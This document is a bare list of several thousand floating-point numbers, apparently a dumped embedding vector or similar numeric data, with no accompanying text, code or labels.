0.015804773196578026, 0.05144549533724785, 0.026720942929387093, -0.0023435214534401894, 0.01263102050870657, -0.0171612948179245, -0.023496001958847046, -0.011927164159715176, -0.02078295685350895, -0.029101258143782616, 0.002473094966262579, -0.02984350547194481, -0.00833749771118164, 0.014499438926577568, -0.01730206608772278, -0.032556552439928055, 0.005886797793209553, 0.010615432634949684, -0.022037100046873093, -0.026337021961808205, 0.0023435214534401894, 0.011959157884120941, 0.013219700194895267, -0.017788367345929146, 0.020706171169877052, 0.040695689618587494, 0.002381913596764207, -0.023867126554250717, 0.021448420360684395, 0.01044266764074564, -0.021653179079294205, 0.004175147507339716, -0.00924611184746027, 0.0051797423511743546, -0.010122733190655708, 0.0028890101239085197, 0.014192301779985428, 0.010033151134848595, 0.011165720410645008, 0.013232497498393059, -0.041207585483789444, 0.0022667371667921543, 0.020347844809293747, 0.03437378257513046, -0.002381913596764207, 0.024315034970641136, 0.005515673663467169, -0.01677737385034561, -0.0018060312140733004, 0.005586059298366308, 0.007236922159790993, 0.017276471480727196, -0.04791341722011566, -0.02201150543987751, -0.04745271056890488, -0.01163922343403101, 0.017506824806332588, -0.014397060498595238, -0.003919199574738741, 0.001796433120034635, -0.031558357179164886, 0.005003778263926506, -0.03135359659790993, -0.024993296712636948, 0.00938048493117094, 0.00116616184823215, -0.04115639626979828, -0.01360362209379673, -0.004187944810837507, 0.0020363840740174055, -0.005310915410518646, -0.0074736736714839935, 0.005403696559369564, 0.014435452409088612, -0.011472857557237148, 0.012176713906228542, 0.015318471938371658, -0.009988360106945038, -0.023457609117031097, 0.0013021341292187572, -0.047836631536483765, -0.007076954934746027, 0.017250876873731613, 0.01232388336211443, 0.02037343941628933, -0.013059733435511589, -0.0016236684750765562, 0.016329465433955193, 0.03562792390584946, 0.004482284653931856, 0.007800007238984108, 0.009745210409164429, -0.0025370819494128227, 0.005835608579218388, 0.013885164633393288, 0.04576345533132553, 0.0018476226832717657, -0.031148839741945267, 0.0030889692716300488, -0.015919949859380722, 0.0007222525309771299, 0.00016076717292889953, 0.004562268499284983, 0.016534224152565002, 0.007806405890733004, 0.0009901977609843016, 0.006705830805003643, -0.007838399149477482, -0.011440863832831383, 0.0039799874648451805, -0.01103774644434452, -0.0013421259354799986, 0.009310099296271801, -0.035807088017463684, 0.032147035002708435, 0.02016868069767952, 0.021486813202500343, -0.016393452882766724, 0.0036920460406690836, 0.009239713661372662, 0.008139138109982014, -0.003807222470641136, -0.011524046771228313, -0.029280420392751694, -0.0010789796942844987, 0.021269256249070168, 0.04555869847536087, 0.008612641133368015, -0.024276642128825188, 0.019567204639315605, -0.01630387082695961, -0.016559818759560585, 0.03176311403512955, 0.011370478197932243, 0.01883775368332863, 0.0038744087796658278, 0.04481644928455353, 0.04102842137217522, -0.017993126064538956, -0.014780981466174126, -0.03004826419055462, 0.01879936084151268, -0.010928967967629433, -0.013462850823998451, -0.014550629071891308, 0.01240706630051136, 0.005016575567424297, -0.024967702105641365, 0.025146864354610443, -0.009662027470767498, 0.04760627821087837, 0.01603512652218342, -0.0044950819574296474, -0.01955440640449524, 0.01965678669512272, 0.010205916129052639, 0.003634457942098379, 0.0072049289010465145, 0.023598380386829376, 0.00405037309974432, 0.03383629024028778, 0.021410027518868446, -0.011933563277125359, 0.01150485035032034, -0.015267282724380493, 0.014000341296195984, -0.039083220064640045, 0.02268976718187332, 0.013462850823998451, 0.009943569079041481, 0.00984119065105915, 0.026618564501404762, 0.005099758505821228, -0.009802797809243202, 0.00007153538899729028, 0.003823219332844019, 0.0038328173104673624, 0.001338126719929278, -0.037752289324998856, -0.006769817788153887, -0.004184745252132416, -0.030099453404545784, 0.02242102101445198, -0.0014021137030795217, 0.006293114740401506, 0.028256630524992943, 0.011242504231631756, 0.014998537488281727, -0.0038168206810951233, 0.005614853464066982, 0.012701406143605709, -0.033170826733112335, 0.018952930346131325, -0.004187944810837507, -0.0023115279618650675, -0.025863518938422203, 0.0020971717312932014, -0.02082134783267975, 0.011095334775745869, -0.04174507409334183, 0.001305333455093205, -0.01579197496175766, 0.0049237944185733795, -0.014819374307990074, 0.011978354305028915, -0.014691400341689587, -0.025965897366404533, 0.01947762258350849, -0.03864810988306999, 0.0030617748852819204, -0.0020939724054187536, 0.009764405898749828, -0.013027739711105824, 0.0055892588570714, -0.04005581885576248, -0.032761309295892715, 0.017929138615727425, -0.006037167273461819, 0.0032153434585779905, -0.002487492049112916, -0.0005114955711178482, -0.047862228006124496, 0.022804943844676018, 0.003711242228746414, 0.016431843861937523, -0.030432185158133507, -0.00036692508729174733, -0.01187597494572401, -0.020283857360482216, -0.012893367558717728, 0.015228889882564545, -0.006008373107761145, -0.009681222960352898, -0.00955324899405241, 0.024187060073018074, -0.016124706715345383, 0.03355474770069122, 0.053749024868011475, 0.011709609068930149, 0.018313059583306313, -0.012618223205208778, 0.022907322272658348, 0.014614615589380264, 0.026464994996786118, -0.005582860205322504, -0.014333073049783707, -0.0017404445679858327, 0.042640890926122665, -0.0029705935157835484, -0.006331507116556168, 0.04443252831697464, 0.028000682592391968, -0.02569715306162834, -0.011607229709625244, 0.02215227670967579, -0.010282699950039387, -0.021576393395662308, -0.016483034938573837, -0.0022043499629944563, -0.024430211633443832, -0.0001586675934959203, 0.012803785502910614, -0.02105170115828514, 0.006667438428848982, 0.023623976856470108, -0.011005752719938755, 0.009150131605565548, -0.008964569307863712, 0.003311323933303356, -0.03660052642226219, -0.026209048926830292, -0.03931357339024544, 0.0009502059547230601, 0.008222321048378944, 0.0332220159471035, -0.006283516995608807, -0.025454001501202583, 0.015228889882564545, -0.043255168944597244, 0.016534224152565002, 0.0062739187851548195, 0.016060721129179, -0.008830197155475616, -0.01595834083855152, -0.010685818269848824, -0.039671897888183594, -0.004706238862127066, 0.013565230183303356, -0.006507471203804016, 0.032121442258358, -0.03158394992351532, 0.02135883830487728, 0.004683843348175287, 0.010205916129052639, 0.031635139137506485, -0.013219700194895267, -0.008318301290273666, 0.018517818301916122, -0.02217787131667137, 0.0028954087756574154, -0.015075321309268475, -0.010385079309344292, -0.02761675976216793, 0.025684354826807976, 0.013309282250702381, 0.015638407319784164, -0.021614786237478256, 0.003436098340898752, 0.002236343454569578, -0.014473844319581985, -0.022293047979474068, -0.015587217174470425, -0.029203636571764946, -0.015919949859380722, 0.018300263211131096, 0.03688206896185875, 0.019835948944091797, -0.028614956885576248, 0.03271012008190155, 0.018069909885525703, -0.013680406846106052, 0.013795582577586174, 0.034680917859077454, 0.022126682102680206, 0.0127142034471035, -0.023969504982233047, -0.021883530542254448, 0.02050141431391239, 0.012874171137809753, -0.0023995100054889917, -0.005218134261667728, -0.034885674715042114, -0.011376876384019852, 0.01575358398258686, 0.016086315736174583, -0.002745039528235793, -0.0065778568387031555, 0.021576393395662308, 0.032351795583963394, -0.0150369293987751, -0.038059428334236145, 0.015369661152362823, -0.02567155845463276, -0.003967189695686102, -0.008740615099668503, -0.01794193685054779, 0.007531262002885342, 0.0196823813021183, -0.0035672716330736876, 0.020053505897521973, 0.020079100504517555, 0.0186585895717144, -0.004722235724329948, -0.03360593691468239, 0.023406419903039932, 0.021243661642074585, -0.010026752948760986, 0.006056363228708506, -0.004018379375338554, 0.008849392645061016, 0.03386188670992851, 0.004258330445736647, 0.01996392384171486, -0.0019452028209343553, -0.008932575583457947, 0.010532249696552753, 0.0024970900267362595, -0.016943739727139473, -0.00555406603962183, -0.07509506493806839, -0.003117763437330723, 0.012157517485320568, 0.0611715093255043, -0.005240529775619507, -0.0057300301268696785, 0.022676968947052956, -0.00619393540546298, 0.013731596060097218, 0.014768184162676334, 0.003471291158348322, 0.008702223189175129, 0.0048758042976260185, -0.0065970527939498425, -0.000935808930080384, 0.04553310200572014, 0.0067506213672459126, 0.01603512652218342, -0.023163270205259323, 0.0037368368357419968, -0.02771914005279541, 0.01650862954556942, 0.021678773686289787, -0.014141112565994263, -0.02129485085606575, 0.015088118612766266, 0.004693441558629274, 0.001905210898257792, -0.0010469862027093768, 0.017340458929538727, 0.015203295275568962, -0.014333073049783707, 0.012976550497114658, 0.010519452393054962, 0.022293047979474068, 0.01276539359241724, 0.002021987223997712, 0.027667950838804245, -0.03383629024028778, -0.013360471464693546, 0.021013308316469193, 0.003519281279295683, -0.03160954639315605, -0.019029714167118073, -0.004728634376078844, 0.003500085324048996, -0.0070257652550935745, -0.022817740216851234, -0.030713727697730064, -0.00041271571535617113, 0.010333890095353127, -0.0006126748630777001, -0.01044266764074564, -0.013475648127496243, 0.012093530036509037, -0.013936353847384453, -0.0014181104488670826, 0.014908955432474613, 0.018159491941332817, 0.009015758521854877, 0.04847650229930878, 0.01879936084151268, 0.003765631001442671, 0.03729158639907837, -0.01165841892361641, 0.0013101324439048767, 0.020718969404697418, -0.011652020737528801, 0.003900003619492054, 0.00718573248013854, -0.0011005753185600042, 0.022881727665662766, 0.0063027129508554935, -0.01533126924186945, 0.011146523989737034, 0.031020864844322205, -0.018914537504315376, -0.006363500375300646, 0.013283687643706799, -0.012944556772708893, -0.03178871050477028, 0.03701004385948181, -0.008081549778580666, -0.017046120017766953, 0.030304212123155594, -0.00551887322217226, 0.003807222470641136, -0.01112732756882906, -0.002562676789239049, 0.020296655595302582, -0.014141112565994263, -0.00026974492357112467, 0.03386188670992851, 0.00011317688768031076, -0.003669650759547949, -0.011101732961833477, 0.030227428302168846, 0.007991967722773552, 0.01722528226673603, -0.01411551795899868, 0.011831183917820454, 0.00261066691018641, 0.0015884756576269865, 0.008081549778580666, -0.006565059535205364, -0.0006110752001404762, 0.005499676801264286, 0.01133208628743887, -0.015612811781466007, -0.0005698836175724864, 0.0022635378409177065, -0.00931649748235941, -0.005096559412777424, -0.011895171366631985, -0.002842619549483061, 0.010385079309344292, -0.014499438926577568, -0.021384432911872864, 0.01842823624610901, 0.0015740785747766495, 0.009719614870846272, 0.0033209219109266996, 0.01098655629903078, 0.008503863587975502, 0.008670229464769363, 0.0013781186426058412, -0.017097309231758118, 0.005435689818114042, -0.026823323220014572, 0.025287635624408722, 0.008113543502986431, 0.0181850865483284, -0.0017580409767106175, -0.006590654142200947, -0.020117491483688354, 0.005656444933265448, -0.010493856854736805, 0.019938329234719276, -0.021729962900280952, -0.04950029030442238, 0.003941595088690519, 0.007192131597548723, 0.005714033264666796, -0.00817113183438778, -0.007972772233188152, 0.01066662184894085, -0.013424458913505077, 0.009361288510262966, -0.012886968441307545, -0.007012967951595783, -0.034322589635849, -0.007716824300587177, 0.026925701647996902, -0.01088417787104845, 0.009457268752157688, -0.00856145191937685, 0.019733570516109467, 0.016252681612968445, -0.01828746497631073, -0.02608107402920723, -0.01650862954556942, 0.017199687659740448, -0.002882611472159624, -0.011690412648022175, -0.000645468186121434, 0.015971139073371887, -0.005858003627508879, 0.005720431916415691, 0.013949151150882244, 0.01426908653229475, 0.020181478932499886, -0.0005586859188042581, 0.016060721129179, -0.030483374372124672, 0.00817113183438778, 0.0054068961180746555, -0.011370478197932243, 0.00567244179546833, 0.003807222470641136, -0.03373391181230545, -0.008516660891473293, 0.015523229725658894, 0.0008302304777316749, -0.021141283214092255, -0.006376298144459724, 0.002044382505118847, 0.0011549642076715827, 0.0027274431195110083, 0.022881727665662766, -0.01695653796195984, 0.00721132755279541, 0.009271706454455853, 0.03260774165391922, -0.014128315262496471, 0.0012685409747064114, -0.005512474570423365, 0.03352915495634079, 0.01996392384171486, 0.023252852261066437, 0.003903202945366502, -0.023406419903039932, 0.013514040037989616, -0.03342677280306816, -0.005445288028568029, -0.006286716088652611, -0.01128089614212513, 0.008759811520576477, -0.004965385887771845, 0.016073517501354218, 0.011146523989737034, 0.012976550497114658, -0.016662197187542915, 0.016521425917744637, 0.0012861373834311962, -0.003317722585052252, -0.00900936033576727, 0.025799531489610672, -0.00721132755279541, 0.01589435525238514, 0.009770805016160011, -0.014435452409088612, 0.02078295685350895, 0.005358905531466007, -0.007927981205284595, -0.0011589633068069816, 0.02892209403216839, -0.01634226366877556, 0.012112726457417011, -0.02498049847781658, -0.009847588837146759, 0.03148157149553299, -0.003963990602642298, 0.011421667411923409, -0.017762772738933563, 0.017993126064538956, -0.0013869168469682336, 0.007601647637784481, -0.027488786727190018, 0.013104524463415146, -0.012093530036509037, -0.01163922343403101, -0.019119296222925186, 0.01074980478733778, -0.020974917337298393, -0.01240706630051136, 0.0032041457016021013, -0.027795923873782158, 0.017353257164359093, -0.01910649798810482, -0.0033689120318740606, 0.024954903870821, 0.012279092334210873, -0.0018940132576972246, -0.009431674145162106, 0.03788026422262192, -0.014038733206689358, -0.007640040013939142, -0.039287976920604706, -0.012739798985421658, -0.026541780680418015, -0.025313230231404305, -0.024123074486851692, 0.0007886389503255486, -0.008465471677482128, -0.005829209461808205, -0.01345005352050066, -0.0171612948179245, -0.016278276219964027, 0.029510773718357086, -0.008062353357672691, 0.002041183179244399, 0.006737824063748121, 0.0036408565938472748, 0.01575358398258686, 0.03654933720827103, 0.007729621604084969, -0.029715532436966896, 0.014844968914985657, 0.00847826898097992, -0.0004795020795427263, 0.008247915655374527, 0.027386408299207687, -0.016687791794538498, 0.018466629087924957, -0.005390899255871773, -0.0012253497261554003, 0.028512578457593918, -0.013833975419402122, -0.01603512652218342, 0.03360593691468239, -0.013539635576307774, -0.019810354337096214, 0.008375889621675014, -0.008036758750677109, -0.013398864306509495, -0.001136567909270525, 0.002609067130833864, 0.008503863587975502, 0.013949151150882244, 0.0020603793673217297, 0.004741431679576635, -0.03575589880347252, -0.016483034938573837, 0.0352695994079113, 0.030688133090734482, -0.00029573962092399597, -0.016521425917744637, 0.030201833695173264, -0.00034492957638576627, 0.008606242947280407, 0.018620198592543602, 0.01654702052474022, -0.005330111365765333, -0.0021275654435157776, -0.0156256090849638, 0.00469984021037817, 0.0028618155047297478, -0.005608454812318087, -0.0026618563570082188, -0.03882727026939392, 0.010397876612842083, -0.017929138615727425, -0.0027546375058591366, -0.00968762207776308, -0.008043157868087292, -0.003621660405769944, -0.008177530020475388, -0.011069739237427711, -0.009226915426552296, 0.021921923384070396, 0.008011164143681526, 0.0321982242166996, 0.00028954088338650763, -0.01647023670375347, 0.008734216913580894, -0.0055700624361634254, -0.00010337888670619577, 0.015228889882564545, -0.005400497000664473, 0.02084694243967533, -0.001582076889462769, -0.01698213256895542, 0.003410503501072526, -0.0053781019523739815, -0.014333073049783707, 0.02098771370947361, 0.016905348747968674, 0.03962070867419243, 0.012822981923818588, -0.016623806208372116, -0.0005758823826909065, -0.0021419625263661146, 0.018005922436714172, -0.020667780190706253, 0.016188694164156914, 0.017826760187745094, -0.005864402279257774, 0.018223479390144348, 0.007070556282997131, 0.005726830568164587, 0.0018444233573973179, -0.021832341328263283, 0.005218134261667728, 0.008331098593771458, -0.00960443913936615, -0.012733399868011475, -0.012048739939928055, 0.0028746130410581827, 0.03299166262149811, -0.002885810798034072, -0.012816582806408405, 0.011012150906026363, -0.04929553344845772, -0.014832171611487865, -0.012496648356318474, 0.009361288510262966, -0.009322896599769592, 0.014653007499873638, -0.013155713677406311, -0.024225452914834023, -0.010788196697831154, -0.0015924748731777072, 0.012125523760914803, 0.01134488359093666, -0.008055955171585083, -0.0223570354282856, -0.009764405898749828, -0.006648242473602295, -0.008990163914859295, 0.003346516750752926, 0.0045526702888309956, 0.02190912701189518, 0.02307368814945221, 0.012778190895915031, 0.008747014217078686, 0.010295497253537178, 0.017481230199337006, -0.016073517501354218, 0.006942582316696644, 0.01209992915391922, -0.021410027518868446, 0.0047510298900306225, 0.006705830805003643, 0.021205270662903786, 0.012483851052820683, 0.014281883835792542, 0.023918315768241882, 0.011031347326934338, -0.01451223623007536, -0.023777544498443604, -0.0026618563570082188, -0.009527654387056828, 0.003912800922989845, 0.003039379371330142, 0.009566046297550201, 0.0018780165119096637, 0.01391075924038887, 0.028563767671585083, -0.007428883109241724, -0.024686159566044807, 0.017097309231758118, -0.023777544498443604, -0.002378714270889759, 0.017007727175951004, -0.020706171169877052, -0.020488616079092026, -0.010225111618638039, 0.0034584938548505306, 0.013258093036711216, -0.028307819738984108, -0.002532282844185829, 0.002167557366192341, 0.005288519896566868, -0.013347674161195755, 0.03555114194750786, 0.002042782958596945, 0.012259896844625473, 0.006395494099706411, 0.01156883779913187, 0.023572785779833794, -0.022472212091088295, -0.005819611717015505, 0.0006886593764647841, 0.0007630441687069833, 0.012720602564513683, 0.01722528226673603, -0.004715837072581053, -0.0038904056418687105, -0.0014557027025148273, 0.00432231742888689, 0.04128437116742134, 0.028307819738984108, 0.053646646440029144, 0.00900936033576727, 0.0028202240355312824, 0.007268915884196758, 0.008862189948558807, -0.01052585057914257, -0.02953636832535267, -0.027565570548176765, -0.004776624497026205, 0.02963874861598015, -0.015254485420882702, 0.01736605353653431, 0.01904251240193844, -0.013846772722899914, 0.014051530510187149, -0.008145536296069622, -0.0042487322352826595, -0.03562792390584946, 0.018005922436714172, 0.009847588837146759, -0.0000652866656309925, -0.009054151363670826, 0.019132092595100403, -0.01391075924038887, 0.002197951078414917, 0.0003503284533508122, 0.01798032782971859, -0.019298458471894264, 0.008663831278681755, -0.022536197677254677, -0.008068752475082874, 0.011703209951519966, -0.02016868069767952, -0.034194618463516235, 0.009194922633469105, -0.013897961936891079, -0.022241858765482903, 0.028179844841361046, -0.018812159076333046, 0.003852013498544693, 0.0010653825011104345, 0.004754228983074427, 0.03660052642226219, -0.004424696322530508, 0.00654586311429739, -0.011536844074726105, 0.015804773196578026, 0.02587631531059742, 0.010999353602528572, 0.00968762207776308, -0.009348491206765175, -0.013590824790298939, 0.007863993756473064, 0.003983186557888985, -0.013130119070410728, -0.001921207644045353, -0.016687791794538498, -0.009885981678962708, 0.009310099296271801, -0.0005242929328233004, -0.0027402404230087996, 0.024046290665864944, -0.004293523263186216, -0.01726367510855198, 0.012023145332932472, 0.019810354337096214, 0.0012949355877935886, 0.014166707172989845, 0.02037343941628933, -0.022753752768039703, 0.0032793304417282343, -0.014780981466174126, 0.003314523259177804, 0.010928967967629433, -0.009751608595252037, -0.003378510009497404, -0.011383275501430035, -0.004459889139980078, 0.025684354826807976, 0.0023083286359906197, 0.018005922436714172, -0.006974575575441122, 0.0061011542566120625, 0.02238263003528118, -0.010890576057136059, 0.005643647629767656, 0.009879582561552525, -0.009476465173065662, 0.0076528373174369335, 0.013488445430994034, 0.010487458668649197, 0.003637657267972827, -0.01718689128756523, -0.012650216929614544, 0.0048470101319253445, 0.001445304835215211, 0.0057236310094594955, 0.00034792895894497633, -0.0160991121083498, 0.013334876857697964, 0.02078295685350895, 0.008369490504264832, 0.017007727175951004, 0.011805589310824871, 0.0008334298036061227, 0.020053505897521973, 0.008759811520576477, -0.01593274623155594, -0.01900411956012249, -0.008919778279960155, -0.008842994458973408, 0.005435689818114042, 0.0005126952892169356, 0.007985569536685944, -0.019093701615929604, -0.002317926613613963, 0.029178041964769363, 0.0010981757659465075, 0.003733637509867549, -0.014704197645187378, -0.00833749771118164, -0.019055308774113655, -0.006558660883456469, 0.0035960657987743616, -0.007544059306383133, -0.005470882635563612, -0.009354889392852783, 0.0006902590394020081, 0.003205745480954647, -0.01487056352198124, 0.005224533379077911, -0.016291072592139244, 0.0014956946251913905, 0.018274668604135513, 0.016150301322340965, -0.017481230199337006, 0.030329806730151176, -0.011389674618840218, 0.0007662435527890921, 0.0014229094376787543, -0.0015780777903273702, 0.011229706928133965, 0.009751608595252037, -0.018479427322745323, 0.028768526390194893, -0.00503257242962718, -0.007051360327750444, -0.007460876367986202, -0.0056468467228114605, -0.000980599783360958, 0.0011413668980821967, 0.018005922436714172, 0.0011285695945844054, 0.005333310924470425, -0.0018188286339864135, -0.008702223189175129, 0.003896804293617606, 0.01832585781812668, 0.0069297850131988525, -0.00458146445453167, -0.0025082877837121487, 0.012067935429513454, -0.001183758256956935, -0.014742589555680752, -0.00833749771118164, -0.009156529791653156, 0.011466458439826965, 0.011140124872326851, -0.0008830197039060295, 0.04169388487935066, 0.01626547798514366, 0.006158742588013411, -0.0050741638988256454, 0.008574249222874641, -0.00776801398023963, -0.005112555809319019, -0.003484088461846113, 0.0049237944185733795, 0.027744734659790993, 0.03624219819903374, 0.002978591714054346, 0.002209148835390806, 0.015945544466376305, -0.010474661365151405, 0.016828563064336777, -0.0076720332726836205, 0.026119466871023178, 0.015356863848865032, 0.0030777715146541595, -0.005243729334324598, -0.003040978917852044, -0.0034328990150243044, -0.012259896844625473, -0.0006654640892520547, -0.0002585471956990659, -0.004088765010237694, 0.011664818041026592, 0.011479255743324757, 0.011997549794614315, -0.00506776524707675, -0.01883775368332863, 0.0007874392322264612, -0.030227428302168846, -0.0011917566880583763, 0.00787679199129343, -0.0041047618724405766, 0.006433886010199785, 0.007275314535945654, 0.010321092791855335, -0.006005173549056053, 0.00789598748087883, 0.0036440559197217226, -0.0018156291916966438, -0.011082536540925503, 0.010858582332730293, -0.017481230199337006, 0.005429291166365147, 0.022843334823846817, 0.018684184178709984, 0.0018396243685856462, -0.0003619260969571769, -0.01218311209231615, 0.017711583524942398, 0.01722528226673603, -0.012400668114423752, -0.01217031478881836, -0.006757020018994808, -0.012451857328414917, 0.009700419381260872, -0.01302134059369564, 0.006891392637044191, -0.01539525669068098, 0.00856145191937685, 0.0031705526635050774, 0.018159491941332817, -0.02156359702348709, -0.00705775897949934, 0.0036600525490939617, 0.014844968914985657, -0.015715191140770912, -0.009207719936966896, 0.004367108456790447, -0.0067506213672459126, 0.007294510491192341, -0.0036792487371712923, 0.007217726204544306, -0.009226915426552296, -0.011492053046822548, 0.00401518028229475, 0.0165726151317358, -0.0016876553418114781, -0.007863993756473064, -0.025006093084812164, -0.007863993756473064, 0.0166494008153677, -0.00555406603962183, 0.011492053046822548, 0.03844334930181503, -0.004530274774879217, 0.007633641362190247, -0.02084694243967533, -0.009937170892953873, -0.0030617748852819204, -0.0038584121502935886, 0.014461047016084194, -0.00818392913788557, 0.013680406846106052, 0.025146864354610443, -0.001013393048197031, 0.026196250692009926, -0.012810184620320797, 0.0004835012659896165, -0.003743235720321536, 0.002439501928165555, -0.02272815816104412, 0.00567244179546833, -0.006840203423053026, 0.017391648143529892, 0.021179674193263054, -0.0003437298000790179, -0.01554882526397705, -0.026925701647996902, -0.026234643533825874, 0.005787617992609739, 0.0039799874648451805, 0.0002737441100180149, -0.0008886185241863132, 0.002548279706388712, -0.01437146496027708, 0.011907968670129776, 0.0020859739743173122, -0.008862189948558807, -0.009348491206765175, 0.0038872063159942627, 0.010244308039546013, 0.008945373818278313, 0.007390490733087063, -0.009847588837146759, -0.013987543992698193, 0.005461284890770912, 0.010353085584938526, 0.003525680163875222, -0.01437146496027708, -0.04067009687423706, -0.01457622367888689, 0.0023083286359906197, -0.00725611811503768, 0.013098125346004963, 0.0034616931807249784, 0.0050741638988256454, -0.01698213256895542, -0.003823219332844019, 0.00774241890758276, 0.01156883779913187, 0.007326503749936819, 0.003282529767602682, -0.00023695161507930607, -0.00917572621256113, 0.00651067029684782, 0.0016100711654871702, 0.009047752246260643, -0.014409857802093029, -0.034271400421857834, 0.005944386124610901, 0.011850380338728428, 0.027488786727190018, 0.012247099541127682, -0.009745210409164429, 0.007755216211080551, -0.00817113183438778, -0.003810421796515584, -0.023022498935461044, -0.004319117870181799, 0.0037400363944470882, -0.015971139073371887, -0.01261182501912117, -0.004805418662726879, 0.0016316667897626758, 0.03178871050477028, 0.018517818301916122, 0.03130240738391876, 0.007320105098187923, -0.00001176009845949011, 0.02211388386785984, 0.010461864061653614, -0.016175897791981697, -0.015497635118663311, 0.0010693816002458334, 0.017174093052744865, -0.014461047016084194, -0.01001395471394062, 0.005304516758769751, -0.010116334073245525, -0.0062547228299081326, -0.0031865492928773165, 0.0017548416508361697, -0.00810074619948864, 0.024046290665864944, -0.0025130868889391422, 0.0027706341352313757, -0.004043974447995424, 0.013680406846106052, 0.004271127749234438, -0.016662197187542915, -0.00960443913936615, -0.0012317484943196177, 0.018876144662499428, -0.00009458068961976096, -0.0031705526635050774, 0.0014557027025148273, -0.0048278141766786575, 0.003423301037400961, 0.01838984526693821, 0.023432014510035515, 0.0013189306482672691, 0.022331440821290016, -0.023086486384272575, -0.013181308284401894, -0.007448079064488411, -0.000002696324372664094, 0.006763419136404991, 0.02604268118739128, 0.005128552671521902, -0.00008833195897750556, -0.009527654387056828, 0.003746435046195984, 0.006846602074801922, -0.014755386859178543, 0.016930943354964256, -0.012522242963314056, -0.008087948895990849, 0.014742589555680752, -0.017417242750525475, -0.011920765973627567, -0.005867601837962866, -0.012822981923818588, -0.007179333828389645, -0.013040537014603615, 0.005797216203063726, 0.004386304412037134, 0.03127681463956833, 0.00035452761221677065, -0.007691229227930307, -0.00405037309974432, -0.0007346500060521066, -0.00986038614064455, 0.013654811307787895, -0.017993126064538956, -0.0051797423511743546, -0.027335217222571373, -0.010615432634949684, -0.01726367510855198, 0.005653245374560356, 0.015164903365075588, 0.01647023670375347, 0.015612811781466007, -0.01539525669068098, -0.01575358398258686, -0.02812865562736988, -0.014294681139290333, -0.005093359854072332, 0.006942582316696644, 0.005592457950115204, 0.010045948438346386, 0.00811994168907404, -0.005947585683315992, 0.016969334334135056, 0.011242504231631756, -0.01314291637390852, -0.013437256217002869, 0.004536673426628113, 0.02135883830487728, 0.00352887948974967, -0.025748342275619507, 0.005269323941320181, -0.014345870353281498, 0.01309172622859478, -0.004191144369542599, -0.002428304171189666, -0.009732413105666637, 0.010660222731530666, -0.013322079554200172, -0.04279446229338646, -0.01873537339270115, -0.00507736299186945, -0.008887785486876965, -0.007838399149477482, -0.0065970527939498425, -0.010864981450140476, 0.00827351026237011, 0.011939961463212967, 0.0024602976627647877, -0.012419863604009151, -0.013693204149603844, -0.0018156291916966438, -0.0057300301268696785, -0.01133208628743887, -0.03660052642226219, 0.009118137881159782, -0.04445812106132507, 0.013590824790298939, -0.006437085568904877, 0.010737007483839989, 0.007940778508782387, 0.013386067003011703, -0.012215105816721916, -0.017378851771354675, -0.004517477471381426, 0.001961199566721916, -0.011095334775745869, 0.01202954351902008, 0.007441680412739515, 0.005314114969223738, -0.002361117862164974, 0.009937170892953873, 0.01102494914084673, -0.0037208402063697577, -0.03370831534266472, 0.029382800683379173, 0.011050543747842312, -0.006897791288793087, 0.0425129197537899, 0.024481400847434998, 0.023675166070461273, -0.004930193070322275, 0.007729621604084969, -0.025454001501202583, -0.011837583035230637, 0.023841531947255135, 0.008484667167067528, -0.005240529775619507, -0.0036888467147946358, 0.00043111195554956794, -0.009668425656855106, 0.01487056352198124, -0.01661100797355175, 0.01126170065253973, -0.016188694164156914, -0.009514857083559036, 0.0062259286642074585, -0.00622912822291255, -0.0018796161748468876, 0.025748342275619507, 0.016802968457341194, 0.0019100100034847856, 0.006011572666466236, 0.0124774519354105, 0.018927335739135742, -0.007166536524891853, 0.014192301779985428, 0.01309172622859478, -0.016930943354964256, 0.02413587085902691, -0.0007958374917507172, 0.009649229235947132, -0.049065180122852325, -0.009879582561552525, -0.0016796570271253586, 0.029817910864949226, 0.0310976505279541, 0.009815596044063568, 0.014908955432474613, 0.018620198592543602, -0.0275143813341856, -0.016598209738731384, -0.0029689937364310026, 0.0042199380695819855, 0.006027569063007832, 0.012829380109906197, 0.01863299496471882, -0.027795923873782158, 0.002781831892207265, 0.006033967714756727, -0.01136407908052206, -0.00242670439183712, 0.012259896844625473, 0.0078128045424819, -0.025070080533623695, 0.009527654387056828, 0.00893897470086813, 0.005480480846017599, 0.014345870353281498, -0.017865151166915894, -0.013693204149603844, 0.02761675976216793, -0.03273571655154228, 0.005835608579218388, -0.005477281752973795, 0.023112080991268158, -0.004181546159088612, 0.02454538829624653, 0.006737824063748121, -0.015779178589582443, -0.01090337336063385, -0.009207719936966896, -0.005784418899565935, 0.00917572621256113, 0.0006482676253654063, -0.0069297850131988525, -0.0030345802661031485, 0.0029545966535806656, -0.004111160524189472, -0.03166073560714722, 0.0035544740967452526, -0.028282225131988525, 0.01640624925494194, 0.01539525669068098, -0.02382873371243477, -0.003957591950893402, 0.008151935413479805, -0.012944556772708893, 0.015216092579066753, 0.029792316257953644, 0.001997991930693388, -0.0218067467212677, 0.005470882635563612, -0.006270719692111015, 0.020706171169877052, 0.005202137865126133, 0.007441680412739515, 0.002717844909057021, -0.025377217680215836, 0.014742589555680752, 0.009751608595252037, 0.009169328026473522, 5.092709898235626e-7, 0.02064218558371067, 0.023457609117031097, -0.01008434034883976, 0.012675811536610126, -0.006936183664947748, -0.00015516830899287015, -0.005800415761768818, -0.019400838762521744, -0.004645451437681913, 0.01749402843415737, 0.02894768863916397, -0.0021275654435157776, -0.0029146047309041023, -0.019324054941534996, 0.008753412403166294, 0.00608515739440918, -0.014921752735972404, -0.020872537046670914, 0.006155543029308319, -0.013347674161195755, -0.009546850807964802, -0.016009530052542686, 0.01675177924335003, -0.018441034480929375, 0.010269902646541595, 0.01008434034883976, 0.016111910343170166, -0.0059507847763597965, -0.01814669370651245, 0.008625438436865807, -0.011703209951519966, -0.025172458961606026, 0.017519623041152954, 0.006043565925210714, -0.008228719234466553, 0.01165841892361641, -0.015241687186062336, -0.011319288983941078, -0.011287295259535313, 0.0021899528801441193, 0.030534565448760986, 0.02669534832239151, -0.007959974929690361, 0.007780811283737421, 0.016278276219964027, -0.015804773196578026, -0.0001608671445865184, -0.016828563064336777, -0.002653858158737421, -0.015088118612766266, 0.003922399133443832, 0.005448487587273121, 0.015292877331376076, -0.015676798298954964, -0.014819374307990074, 0.03311963751912117, 0.005099758505821228, 0.014461047016084194, 0.01133208628743887, 0.0050261737778782845, 0.009815596044063568, -0.008932575583457947, 0.023265648633241653, -0.010001157410442829, -0.034706514328718185, 0.0031513564754277468, 0.000551887322217226, 0.018824955448508263, -0.0033497160766273737, -0.027232838794589043, -0.004498281516134739, 